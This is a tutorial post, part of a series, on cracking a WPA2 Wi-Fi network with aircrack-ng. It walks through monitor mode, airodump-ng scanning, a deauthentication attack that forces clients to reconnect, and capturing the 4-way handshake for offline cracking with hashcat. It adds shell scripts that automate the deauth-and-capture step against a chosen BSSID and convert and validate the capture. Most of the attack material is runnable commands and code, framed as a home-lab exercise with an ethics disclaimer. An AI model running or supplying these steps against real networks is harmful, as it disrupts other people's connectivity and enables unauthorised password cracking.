Cracking a Vulnerable WPA2 Network – 2

Part 2 – Using Aircrack-ng

In this section, we’ll begin cracking our target WPA2 network using the “aircrack-ng” suite of tools, which is installed by default in Kali Linux. There are other, arguably easier, ways to complete these steps (“Wifite” seems pretty great, honestly), but this is a reliable method that I’ve now used many times successfully.

If you are using another Linux distro such as Ubuntu/Debian or Fedora/RHEL, you will probably need to install the suite.

On Ubuntu or any Debian-based distro:

sudo apt update && sudo apt install -y aircrack-ng

On Fedora or any RPM-based distro:

sudo dnf install aircrack-ng

Let’s get started.


Setting the Adapter to Monitor Mode

Start up your Kali VM and make sure your USB WiFi adapter is assigned to it. I use VMware Player to run Kali, in part because assigning USB devices to the VM is super simple. Once Kali is running, plug in the adapter and VMware will pop up a window asking whether you want to assign the device to your host OS (no) or the VM (yes).

Check the current wireless configuration by typing iwconfig (it comes from the older wireless-tools package; newer systems may ship the iw tool instead, but iwconfig is what the screenshots here show). You should see something like the following screenshot. Note that it reads “Mode:Managed” and the adapter’s name is “wlan0.”

The first tool from aircrack-ng we’ll use is “airmon-ng.” Fire up airmon-ng to check for and kill any interfering processes (NetworkManager, wpa_supplicant and the like, which would otherwise keep resetting the adapter’s channel; this takes down normal WiFi inside the VM until you restart NetworkManager at the end):

sudo airmon-ng check kill

The result will look similar to this:

airmon-ng checks for and kills interfering processes

You’re now ready to put your WiFi adapter into monitor mode. Make sure to replace “wlan0” below with whatever the name of your adapter is (above, the result of the iwconfig command).

sudo airmon-ng start wlan0

You can check that this worked by running iwconfig again; the result should look similar to the screenshot below. Note that the adapter now says “Mode:Monitor” and its name has changed to “wlan0mon.” The exact name depends on your aircrack-ng version and driver, so use whatever iwconfig reports in the commands that follow.


Finding WLAN Info with Airodump-ng

We can now use the adapter to scan for WLANs in range with the following command:

sudo airodump-ng wlan0mon

As you can see below, this shows a lot of useful information about the WLANs that happen to be in range of the adapter: the BSSID, signal power, channel, encryption type and ESSID of each access point in the top section, and the stations (clients) it has seen underneath.

In this case, the network that I am targeting is “TP-LINK_F3D2.” This is the vulnerable WPA2-protected network that I set up at my house with a TP-LINK router.

OK, this next part should go without saying, but please don’t use this process on a network that you don’t own yourself or have EXPLICIT permission to work with. These are powerful tools and I’m sure there is a temptation for some to take a laptop to a coffee shop or library and see what havoc can be wreaked, but that is both unethical and illegal. This tutorial and others like it exist for educational purposes only: learn how to do this stuff in the event that you might one day have a job that requires infiltrating criminal computer organizations (i.e., military, police, etc.). Back to the fun stuff…

This airodump command is useful, but we need to restrict it to our target network. Write down the BSSID (this is the access point’s MAC address), channel number, and ESSID of your target network, then type in the following command, replacing my values with yours:

sudo airodump-ng -w TPLink1 -c 9 --bssid EC:08:6B:2B:F3:D2 wlan0mon

Here -w gives airodump the prefix for the capture files it writes; it records every frame it sees for this network from the moment it starts, which is what lets it save the 4-way handshake once one occurs. -c locks the adapter to the target’s channel (airodump would otherwise keep hopping), and --bssid filters both the display and the capture to that one access point. The result will look like this:

This is where things get a bit tricky. As you can see above, I only have one client on the TP-LINK network because I set up this network specifically for this tutorial, but if you are cracking your own home network, you will probably see many clients appear under “STATION.” If nothing appears after a minute or so, you will need to get a WiFi-enabled device onto the target network: use a phone, tablet, another PC, etc. Once it’s connected, its MAC address will appear under STATION. If you want, go ahead and sign it in and out of the network a few times; you’ll see that line appear and disappear as you do. You need at least one associated client, because the handshake we’re after is exchanged between the access point and a client when it (re)joins; an idle network with no stations never produces one.


Capturing the 4-way Handshake with Aireplay-ng

While your device is signed into the target network, leave your current terminal window open and open a new one. In the new window, issue the following command (again, replacing my BSSID and adapter name with yours):

sudo aireplay-ng --deauth 0 -a EC:08:6B:2B:F3:D2 wlan0mon

This command sends a continuous stream of “deauthentication” frames, spoofed as coming from the router, to the broadcast address, which kicks off every device connected to it. The 0 means keep going until you stop it with Ctrl-C; a small count such as 5 is usually enough, and adding -c followed by a client’s MAC address targets just that station. Your iPhone (or whatever you had connected to the target network) doesn’t like being kicked off, so it immediately reconnects, and that reconnection includes a fresh 4-way handshake. Return to the first terminal window. Within a few seconds you should see “WPA handshake:” followed by the BSSID appear in the top-right corner of the airodump display. If so, you’re in business; stop aireplay-ng with Ctrl-C so you aren’t needlessly jamming the network.

Airodump will have saved several files to the directory you ran it from, named after the -w prefix you gave it; mine was TPLink1, so the file I need is TPLink1-01.cap, as shown below (the -01 counter increments each time you start a capture with the same prefix, so check which number you got). Write down the name of the .cap file that was created on your system; it contains the EAPOL frames of the 4-way handshake that we are going to crack. Note that this is a packet capture rather than a password hash: what we crack is derived from the nonces and MIC inside those frames.
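As an added example (not from the original post or from the aircrack-ng project), here is the airodump-ng and aireplay-ng part of the procedure above as a small POSIX shell script. capture_handshake() assumes root, the aircrack-ng tools in PATH and a monitor-mode interface, so it only does anything on the Kali box; the two helpers, valid_bssid() and stations_for_bssid(), are plain text processing over the CSV that airodump-ng writes beside the .cap, which lets you list the clients that are actually associated (and therefore worth deauthenticating with -c) without reading the screen. The CSV content, the 02:00:00:... client MACs and the timestamps are constructed, not from a real capture; only the AP’s BSSID and ESSID come from the post.

```shell
#!/bin/sh
# Added example, not from the original post: the airodump-ng/aireplay-ng steps
# above wrapped in functions. capture_handshake() needs root, a monitor-mode
# interface and the aircrack-ng suite, so it only runs on the Kali box;
# valid_bssid() and stations_for_bssid() are plain text processing.

# Succeed if $1 looks like a MAC address (six colon-separated hex pairs).
valid_bssid() {
    printf '%s\n' "$1" | grep -Eiq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

# Print the stations airodump-ng saw associated with BSSID $2, read from the
# CSV it writes beside the .cap ($1, e.g. TPLink1-01.csv). The CSV holds an
# access-point section, then a "Station MAC" section whose 6th column is the
# AP each client is associated with ("(not associated)" for clients that are
# only probing). These are the clients worth deauthenticating with -c.
stations_for_bssid() {
    awk -F',' -v target="$(printf '%s' "$2" | tr 'a-f' 'A-F')" '
        /^Station MAC/ { in_stations = 1; next }
        in_stations && NF >= 6 {
            mac = $1; ap = $6
            gsub(/^[ \t]+|[ \t]+$/, "", mac)
            gsub(/^[ \t]+|[ \t]+$/, "", ap)
            if (toupper(ap) == target) print mac
        }' "$1"
}

# Constructed airodump-ng CSV (not a real capture) in the layout the tool
# writes: the post's AP, two made-up clients on it, one client on some other
# AP and one unassociated prober.
sample_csv() {
    cat <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
EC:08:6B:2B:F3:D2, 2019-05-04 10:00:01, 2019-05-04 10:05:00,  9,  54, WPA2, CCMP, PSK, -41,      180,        0,   0.  0.  0.  0,  12, TP-LINK_F3D2,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:AA:BB:01, 2019-05-04 10:00:05, 2019-05-04 10:05:00, -52,       64, EC:08:6B:2B:F3:D2,
02:00:00:AA:BB:02, 2019-05-04 10:01:10, 2019-05-04 10:04:58, -60,       12, EC:08:6B:2B:F3:D2, TP-LINK_F3D2
02:00:00:AA:BB:03, 2019-05-04 10:02:00, 2019-05-04 10:04:00, -75,        3, 02:00:00:CC:DD:EE,
02:00:00:AA:BB:04, 2019-05-04 10:03:00, 2019-05-04 10:03:30, -80,        2, (not associated) , SomeOtherNet
EOF
}

# Run the capture for BSSID $1 on channel $2 via monitor interface $3, writing
# files with prefix $4 (optional $5: a single client MAC to deauthenticate).
# Sends a bounded burst of deauth frames instead of "--deauth 0", then asks
# aircrack-ng whether the newest capture file holds a handshake.
capture_handshake() {
    bssid=$1; channel=$2; iface=$3; prefix=$4; client=${5:-}
    valid_bssid "$bssid" || { echo "bad BSSID: $bssid" >&2; return 2; }
    for tool in airodump-ng aireplay-ng aircrack-ng; do
        command -v "$tool" >/dev/null 2>&1 || { echo "missing $tool" >&2; return 2; }
    done
    airodump-ng -w "$prefix" -c "$channel" --bssid "$bssid" "$iface" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 10                       # let airodump see the AP and its clients
    if [ -n "$client" ]; then
        aireplay-ng --deauth 5 -a "$bssid" -c "$client" "$iface" >/dev/null 2>&1
    else
        aireplay-ng --deauth 5 -a "$bssid" "$iface" >/dev/null 2>&1
    fi
    sleep 10                       # give the client time to reconnect
    kill "$dump_pid" 2>/dev/null; wait "$dump_pid" 2>/dev/null
    cap=$(ls -t "$prefix"-*.cap 2>/dev/null | head -n 1)
    # aircrack-ng lists each AP in the file as "WPA (N handshake)"; N>0 is success.
    if [ -n "$cap" ] && aircrack-ng "$cap" </dev/null 2>/dev/null |
            grep -q 'WPA ([1-9][0-9]* handshake'; then
        echo "handshake captured in $cap"
        return 0
    fi
    echo "no handshake in ${cap:-any capture}; check associated clients with:" >&2
    echo "  stations_for_bssid ${prefix}-01.csv $bssid" >&2
    return 1
}

# Usage: sh capture.sh capture <bssid> <channel> <monitor-iface> <prefix> [client]
#        sh capture.sh stations <prefix>-01.csv <bssid>
case "${1:-}" in
    capture)  shift; capture_handshake "$@" ;;
    stations) shift; stations_for_bssid "$@" ;;
esac
```

The bounded deauth count is deliberate: a never-ending --deauth 0 keeps every client off the network for as long as you forget to press Ctrl-C, and one or two short bursts are all a reconnecting client needs to produce the handshake.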

At this point, we are finished using aircrack-ng, so you can safely close both terminal windows if you want. It’s probably a good idea to return your USB WiFi adapter to managed mode, which you can do with the following commands. Enter them one at a time and they should get you back up and running normally. (airmon-ng stop already puts the interface back into managed mode under its original name; the ifconfig and iwconfig lines are older net-tools/wireless-tools commands that make sure of it, and the last line brings back NetworkManager, which check kill stopped earlier.)

sudo airmon-ng stop wlan0mon
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode managed
sudo service NetworkManager restart

In Part 3 of this series, we’ll use hashcat to recover the password from the handshake we captured in this step.

Preparing Hashcat

We are going to use hashcat to do the rest of the work for us from here. First, we must convert the .cap file mentioned above into a format hashcat understands. For this, we’ll use a helper binary from hashcat-utils written specifically for that purpose. Here is the command I used:

sudo /usr/share/hashcat-utils/cap2hccapx.bin TPLink1-01.cap wpa2.hccapx

The binary we need is called cap2hccapx.bin. In my Kali VM, it’s located at /usr/share/hashcat-utils, but yours may be in a different location. Check to see if it’s in the usual place:

ls -a /usr/share/hashcat-utils

If you get an error or the directory is empty, you will need to search the file system for that .bin (find or locate will do). If you happen to be following along on Ubuntu, for example, the hashcat-utils package installs it elsewhere. You can always run which hashcat to check whether the main program is installed and where in your PATH it lives.

The rest of the command above is simply the .cap file to be converted and the name we’ve chosen for the output .hccapx file (the input format for hashcat’s mode 2500). Note that newer hashcat releases (6.x) prefer mode 22000 with a .hc22000 file produced by hcxpcapngtool from the hcxtools package; .hccapx and mode 2500 still work but are marked deprecated, so if your hashcat complains, that is the route to take. After running, you should see this (the number of handshakes will vary):
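As an added example, not the post’s own command and not part of hashcat or hashcat-utils: a shell script that finds cap2hccapx.bin wherever the package put it, runs the conversion, and verifies the result offline by checking the .hccapx layout (fixed 393-byte records, each starting with the ASCII signature HCPX), which tells you how many handshakes actually made it into the file before you spend GPU time on it. The install paths other than /usr/share/hashcat-utils are assumptions, and make_sample_hccapx() writes a constructed file for exercising the checker, not a real handshake. The check does not apply to the text-based .hc22000 format.

```shell
#!/bin/sh
# Added example, not from the original post: locate cap2hccapx, run the
# conversion, and sanity-check the result. hccapx_handshakes() depends only on
# the .hccapx layout (fixed 393-byte records, each starting with the ASCII
# signature "HCPX"), so it runs without hashcat installed.

# Print the path of cap2hccapx.bin: PATH first, then the Kali location from the
# post and two other install directories (assumed, adjust to taste), then a
# filesystem search as a last resort. Returns 1 if nothing is found.
find_cap2hccapx() {
    if command -v cap2hccapx.bin >/dev/null 2>&1; then
        command -v cap2hccapx.bin
        return 0
    fi
    for p in /usr/share/hashcat-utils/cap2hccapx.bin \
             /usr/lib/hashcat-utils/cap2hccapx.bin \
             /usr/local/bin/cap2hccapx.bin; do
        if [ -x "$p" ]; then printf '%s\n' "$p"; return 0; fi
    done
    found=$(find / -name cap2hccapx.bin -type f 2>/dev/null | head -n 1)
    if [ -n "$found" ]; then printf '%s\n' "$found"; return 0; fi
    return 1
}

# Count the handshakes in .hccapx file $1: the size must be a whole number of
# 393-byte records and every record must begin with "HCPX". Prints the count;
# returns 1 if the file is not a valid .hccapx (e.g. the conversion found no
# handshake and wrote nothing, or you pointed it at the wrong file).
hccapx_handshakes() {
    size=$(wc -c < "$1" | tr -d ' ')
    [ "$size" -gt 0 ] && [ $((size % 393)) -eq 0 ] || return 1
    n=$((size / 393)); i=0
    while [ "$i" -lt "$n" ]; do
        sig=$(dd if="$1" bs=1 skip=$((i * 393)) count=4 2>/dev/null)
        [ "$sig" = "HCPX" ] || return 1
        i=$((i + 1))
    done
    printf '%s\n' "$n"
}

# Convert capture $1 (e.g. TPLink1-01.cap) to $2 (e.g. wpa2.hccapx) for
# hashcat mode 2500 and report how many handshakes the output holds.
convert_capture() {
    tool=$(find_cap2hccapx) || { echo "cap2hccapx.bin not found" >&2; return 2; }
    "$tool" "$1" "$2" >/dev/null || return 1
    count=$(hccapx_handshakes "$2") || { echo "$2 is not a valid .hccapx" >&2; return 1; }
    echo "$count handshake(s) written to $2"
}

# Write a constructed two-record .hccapx-shaped file to $1 for exercising the
# checker: signatures plus zero padding, not real handshakes.
make_sample_hccapx() {
    : > "$1"
    i=0
    while [ "$i" -lt 2 ]; do
        printf 'HCPX' >> "$1"
        dd if=/dev/zero bs=1 count=389 >> "$1" 2>/dev/null
        i=$((i + 1))
    done
}

# Usage: sh convert.sh convert <capture.cap> <out.hccapx>
#        sh convert.sh check <file.hccapx>
case "${1:-}" in
    convert) shift; convert_capture "$@" ;;
    check)   shift; hccapx_handshakes "$@" ;;
esac
```

A zero-byte or oddly sized output is the usual sign that the deauth never produced a complete handshake, in which case go back to the capture step rather than feeding the file to hashcat.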
